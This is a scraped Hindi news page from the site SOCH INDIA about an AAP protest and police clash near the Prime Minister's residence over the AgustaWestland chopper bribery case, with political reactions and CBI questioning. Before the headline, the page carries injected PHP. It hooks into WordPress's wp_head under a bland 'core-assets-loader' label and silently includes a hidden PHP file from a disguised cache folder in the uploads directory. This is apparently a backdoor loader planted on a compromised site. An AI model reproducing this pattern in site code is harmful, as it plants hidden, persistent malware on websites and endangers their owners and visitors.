add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अगस्ता केस पर AAP का प्रदर्शन, PM आवास के निकट कार्यकर्ताओं और पुलिस में झड़प – SOCH INDIA
Menu

राजनीति
अगस्ता केस पर AAP का प्रदर्शन, PM आवास के निकट कार्यकर्ताओं और पुलिस में झड़प

nobanner

अगस्ता वेस्टलैंड घूसकांड में केंद्र और कांग्रेस के हंगामे व धरना के बाद अब आम आदमी सड़कों पर उतर आई है. शनिवार सुबह बड़ी संख्या में ‘आप’ कार्यकर्ता चॉपर डील के ख‍िलाफ प्रदर्शन करते हुए 7आरसीआर यानी प्रधानमंत्री आवास का घेराव करने पहुंचे. इस दौरान पुलिस ने कार्यकर्ताओं को रोकने का प्रयास किया, जिसके बाद दोनों में झड़प हो गई.

पार्टी के कार्यकर्ता कांग्रेस अध्यक्ष सोनिया गांधी के निवास का भी घेराव करने की योजना लेकर चले हैं. हालांकि इस पूरे मामले में सबसे दिलचस्प बात यह है कि एक दिन पहले ही दिल्ली के मुख्यमंत्री और ‘आप’ के राष्ट्रीय संयोजक अरविंद केजरीवाल ने अगस्ता केस पर कांग्रेस और बीजेपी के प्रदर्शन को नौटंकी करार दिया था.

पीएम मोदी के हमले का जवाब देंगे राहुल?
दूसरी ओर, अगस्ता डील पर पीएम मोदी ने सोनिया गांधी पर निशाना साधा है. तमिलनाडु की रैली में पीएम ने कहा कि हेलीकॉप्टर ‘चोरी’ करने वालों को सजा मिलनी चाहिए. चॉपर डील को लेकर संसद से लेकर सड़क तक संग्राम के बीच कांग्रेस उपाध्यक्ष राहुल गांधी शनिवार को तमिलनाडु में 3 चुनावी रैलियों को संबोधि‍त करेंगे. बहुत संभव है कि वह रैली के मंच से प्रधानमंत्री के हमले का जवाब दें.

पूर्व वायुसेना प्रमुख के जवाब से सीबीआई संतुष्ट नहीं
अगस्ता केस में सीबीआई ने शुक्रवार को भी पूर्व वायुसेना प्रमुख एसपी त्यागी और गौतम खेतान से पूछताछ की. लेकिन बताया जाता है कि जांच एजेंसी उनके जवाब से संतुष्ट नहीं है. पूछताछ में एसपी त्यागी ने सीबीआई से कहा कि वह डील में कन्सल्टेंट थे, बिचौलिए नहीं. हालांकि मामले में उनसे शनिवार को भी पूछताछ होनी है.

दोषी कोई भी हो, कार्रवाई होगी: पर्रिकर
वीवीआईपी चॉपर डील पर रक्षा मंत्री मनोहर पर्रिकर ने राज्यसभा के बाद शुक्रवार को लोकसभा में भी कांग्रेस पर तीखा हमला किया. उन्होंने संसद में बयान देते हुए कहा कि जो काम बोफोर्स के समय नहीं हो सका था वो अगस्ता मामले में होगा. यही नहीं, ‘आज तक’ से खास बातचीत पर्रिकर ने कहा कि दोषी चाहे कोई भी हो, सबूत मिलने पर उसके खि‍लाफ कार्रवाई जरूर होगी. उन्होंने कहा, ‘कांग्रेस की बेचैनी बता रही है कि इस घोटाले में कोई बड़ा नाम शामिल है.

कांग्रेस ने निकाली लोकतंत्र बचाओ रैली
गौरतलब है कि शुक्रवार को इससे पहले कांग्रेस ने ‘लोकतंत्र बचाओ’ रैली के जरिए केंद्र की मोदी सरकार पर हमला बोला. इस दौरान जंतर-मंतर पर पार्टी कार्यकर्ताओं और नेताओं को संबोधि‍त करते हुए पार्टी अध्यक्ष सोनिया गांधी, उपाध्यक्ष राहुल गांधी और पूर्व प्रधानमंत्री मनमोहन सिंह ने कहा कि मोदी सरकार ने दो वर्षों में देश की व्यवस्था को बर्बाद कर के रख दिया.